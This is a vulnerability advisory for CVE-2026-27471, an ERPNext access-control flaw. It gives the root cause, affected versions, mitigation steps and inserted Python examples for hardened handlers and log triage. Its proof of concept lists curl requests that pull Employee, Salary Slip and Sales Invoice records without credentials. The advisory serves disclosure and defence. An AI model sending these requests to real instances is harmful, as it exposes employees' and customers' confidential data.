Critical | CVSS 9.1 | Improper Access Control | CVE-2026-27471

Published February 2026

ERPNext Unauthorized Document Access via Missing Validation

BugBunny.ai discovered a critical access control vulnerability in ERPNext, a free and open source Enterprise Resource Planning tool. Certain API endpoints lacked access validation, allowing unauthenticated and unauthorized users to read sensitive business documents, including employee records, financial data and more.


TL;DR

Missing access validation on sensitive endpoints

Impact: Unauthorized access to sensitive business documents (employee records, financial data, invoices)
Vector: Network-accessible API endpoints without authentication or authorization checks
Surface: All ERPNext deployments on the v15 branch before 15.98.1 or on the v16 branch before 16.6.1
Status: Fixed in ERPNext 15.98.1 and 16.6.1

Root Cause

Certain API endpoints in ERPNext returned document data without first enforcing access control. The application neither verified that the request belonged to an authenticated session nor that the requesting user held read permission on the requested doctype, so knowing the URL was enough to obtain the record. This is both a missing-authentication weakness (CWE-306) and a missing-authorization weakness (CWE-862), falling under the broader category of improper access control (CWE-284).

The vulnerability affects ERPNext versions prior to 15.98.1 in the v15 branch and prior to 16.6.1 in the v16 branch. An attacker with network access to the ERPNext instance could retrieve documents containing confidential business information without any credentials.
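The two missing checks described above, shown side by side as an added example. This is not ERPNext or Frappe code: the document store, session table and role-to-doctype permission map are constructed stand-ins for the framework's own objects, and the handler names (vulnerable_get_doc, hardened_get_doc, dispatch) are hypothetical. The vulnerable handler serves whatever the URL names; the hardened one authenticates, then authorizes, and only then touches the data.

```python
"""The access-control pattern behind CVE-2026-27471, as a self-contained illustration.

Added example, not ERPNext or Frappe code. The document store, session table and
role-to-doctype permission map are constructed stand-ins for the framework's own
objects; the handler names are hypothetical.
"""
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple

# Constructed sample data.
DOCUMENTS: Dict[Tuple[str, str], dict] = {
    ("Employee", "HR-EMP-00001"): {"employee_name": "Jane Doe", "salary_mode": "Bank"},
    ("Sales Invoice", "ACC-SINV-2026-00001"): {"customer": "Acme Ltd", "grand_total": 1200.0},
}
SESSIONS = {"sid-hr": "hr@example.com", "sid-sales": "sales@example.com"}
USER_ROLES = {"hr@example.com": {"HR Manager"}, "sales@example.com": {"Sales User"}}
# Roles allowed to read each doctype (assumption; the real role matrix is far richer).
READ_PERMS = {"Employee": {"HR Manager"}, "Sales Invoice": {"Sales User", "Accounts User"}}


@dataclass
class Request:
    doctype: str
    name: str
    sid: Optional[str] = None  # session id from the cookie; None for an anonymous caller


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def vulnerable_get_doc(req: Request) -> dict:
    """The vulnerable shape: the record is looked up and returned on the strength of
    the URL alone. Nobody checks that a session exists (CWE-306) or that its user
    may read this doctype (CWE-862)."""
    doc = DOCUMENTS.get((req.doctype, req.name))
    if doc is None:
        raise NotFound(f"{req.doctype} {req.name}")
    return dict(doc)


def resolve_user(req: Request) -> str:
    """CWE-306 fix: refuse any request that does not carry a valid session."""
    user = SESSIONS.get(req.sid) if req.sid else None
    if user is None:
        raise Unauthenticated("login required")
    return user


def has_read_permission(user: str, doctype: str) -> bool:
    """CWE-862 fix: role-based read check, denying by default for unknown doctypes."""
    return bool(USER_ROLES.get(user, set()) & READ_PERMS.get(doctype, set()))


def hardened_get_doc(req: Request) -> dict:
    """Authenticate, then authorize, and only then touch the data. The permission check
    runs before the existence check so a denied caller cannot probe for valid names."""
    user = resolve_user(req)
    if not has_read_permission(user, req.doctype):
        raise Forbidden(f"{user} may not read {req.doctype}")
    doc = DOCUMENTS.get((req.doctype, req.name))
    if doc is None:
        raise NotFound(f"{req.doctype} {req.name}")
    return dict(doc)


def dispatch(handler: Callable[[Request], dict], req: Request) -> Tuple[int, dict]:
    """Map handler outcomes to HTTP-style status codes, as a framework's API layer would."""
    try:
        return 200, handler(req)
    except Unauthenticated as e:
        return 401, {"error": str(e)}
    except Forbidden as e:
        return 403, {"error": str(e)}
    except NotFound as e:
        return 404, {"error": str(e)}


if __name__ == "__main__":
    anon = Request("Employee", "HR-EMP-00001")
    sales = Request("Employee", "HR-EMP-00001", sid="sid-sales")
    hr = Request("Employee", "HR-EMP-00001", sid="sid-hr")
    for label, req in [("anonymous", anon), ("sales user", sales), ("hr manager", hr)]:
        print(f"{label:11} vulnerable={dispatch(vulnerable_get_doc, req)[0]} "
              f"hardened={dispatch(hardened_get_doc, req)[0]}")
```

Run stand-alone, the three callers all get 200 from the vulnerable handler, while the hardened one answers 401 to the anonymous caller, 403 to the sales user and 200 only to the HR manager. The ordering in hardened_get_doc is the part worth copying: a permission check that runs after the database lookup still leaks whether a name exists.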

Proof of Concept

# Unauthenticated document access via unvalidated endpoints
# ERPNext versions < 15.98.1 and < 16.6.1

# 1. Access sensitive documents without authentication or authorization
curl -i https://<target>/api/resource/Employee \
  -H "Accept: application/json"

# Response (200 OK — no authentication required):
{
  "data": [
    {
      "name": "HR-EMP-00001",
      "employee_name": "Jane Doe",
      "company_email": "jane@example.com",
      "date_of_birth": "1990-01-15",
      "salary_mode": "Bank",
      ...
    }
  ]
}

# 2. Access other sensitive document types
curl -i https://<target>/api/resource/Salary%20Slip \
  -H "Accept: application/json"

# 3. Access customer/supplier financial data
curl -i https://<target>/api/resource/Sales%20Invoice \
  -H "Accept: application/json"

# Result: Full read access to sensitive business documents
# including employee records, financial data, and more —
# without any authentication or authorization checks.

Weaknesses

CWE-284: Improper Access Control
CWE-306: Missing Authentication for Critical Function
CWE-862: Missing Authorization

Mitigation

  • Upgrade to ERPNext 15.98.1 (v15 branch) or 16.6.1 (v16 branch) immediately
  • No code-level workaround is available; upgrading is the only remediation. Until the upgrade is applied, restricting who can reach the instance at all (VPN or IP allowlist) is the only compensating control, since the attack requires nothing beyond network reachability
  • Review web-server access logs for successful (HTTP 200) GET requests to /api/resource/<doctype> for sensitive doctypes such as Employee, Salary Slip and Sales Invoice that do not correspond to a logged-in session, and treat any such hit as a potential data exposure
  • After upgrading, repeat the proof-of-concept requests without a session to confirm they are rejected rather than answered with document data
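Two small helpers for the triage steps above, added here as an example and not part of the advisory or of ERPNext: is_affected decides from a version string whether a deployment falls inside the affected ranges the advisory names, and find_sensitive_reads runs over access-log lines looking for successful reads of the doctypes the proof of concept requests. Assumptions: the instance sits behind nginx writing the standard "combined" log format, the sensitive-doctype list is the three from the PoC (extend it for your deployment), and the sample log lines are constructed, not real traffic.

```python
"""Triage helpers for CVE-2026-27471.

Added example, not BugBunny.ai or ERPNext code. Assumptions: the fixed versions are the
ones the advisory names; the instance sits behind nginx writing the standard "combined"
log format; the sensitive doctypes are the three the proof of concept requests.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# First fixed release per branch, from the advisory. Other branches are not covered by it.
FIXED = {15: (15, 98, 1), 16: (16, 6, 1)}

# Doctypes named in the proof of concept; extend with whatever your deployment holds.
SENSITIVE_DOCTYPES = {"Employee", "Salary Slip", "Sales Invoice"}


def parse_version(version: str) -> Tuple[int, int, int]:
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised ERPNext version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_affected(version: str) -> Optional[bool]:
    """True/False for the v15 and v16 branches; None where the advisory says nothing."""
    parsed = parse_version(version)
    fixed = FIXED.get(parsed[0])
    return None if fixed is None else parsed < fixed


# nginx "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def doctype_from_path(path: str) -> Optional[str]:
    """/api/resource/Salary%20Slip?limit=5 -> 'Salary Slip'; None for any other route."""
    m = re.match(r"/api/resource/([^/?]+)", path)
    return unquote(m.group(1)) if m else None


def find_sensitive_reads(log_lines: List[str]) -> List[dict]:
    """Successful GETs against the REST resource endpoint for a sensitive doctype.

    The combined format carries no session cookie, so a hit is a lead, not proof of an
    unauthenticated read: correlate the time and source with the application's session
    and activity records before treating it as an incident.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        doctype = doctype_from_path(m["path"])
        if doctype in SENSITIVE_DOCTYPES:
            hits.append({"ip": m["ip"], "time": m["time"], "doctype": doctype,
                         "path": m["path"], "referer": m["referer"], "ua": m["ua"]})
    return hits


# Constructed sample log lines (not real traffic): a scripted client pulls two
# sensitive doctypes; a logged-in browser user is refused one invoice.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Feb/2026:10:14:03 +0000] "GET /api/resource/Employee HTTP/1.1" 200 4821 "-" "curl/8.5.0"',
    '203.0.113.7 - - [12/Feb/2026:10:14:09 +0000] "GET /api/resource/Salary%20Slip?limit_page_length=500 HTTP/1.1" 200 93210 "-" "curl/8.5.0"',
    '198.51.100.4 - - [12/Feb/2026:10:15:11 +0000] "GET /app/employee HTTP/1.1" 200 1873 "https://erp.example.test/app" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Feb/2026:10:15:12 +0000] "GET /api/resource/Sales%20Invoice/ACC-SINV-2026-00001 HTTP/1.1" 403 77 "https://erp.example.test/app" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Feb/2026:10:16:00 +0000] "POST /api/method/login HTTP/1.1" 401 39 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for v in ("15.97.3", "15.98.1", "16.6.0", "16.6.1", "14.80.0"):
        print(f"{v:8} affected={is_affected(v)}")
    for hit in find_sensitive_reads(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} read {hit["doctype"]} via {hit["path"]} ({hit["ua"]})')
```

On the sample lines only the two curl requests from 203.0.113.7 are reported; the browser user's 403 and the failed login are not. An empty referer together with a scripting user agent, as in those two hits, is the pattern to look for first, but absence of a session in the web-server log is not proof of an unauthenticated read, so confirm against the application's own session records before escalating.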

Credits & Disclosure

Reported by zaddy6 and responsibly disclosed to the ERPNext maintainers. Credit accepted by Arthur Gervais (BugBunny.ai). Published via GitHub Security Advisory GHSA-wpfx-jw7g-7f83.
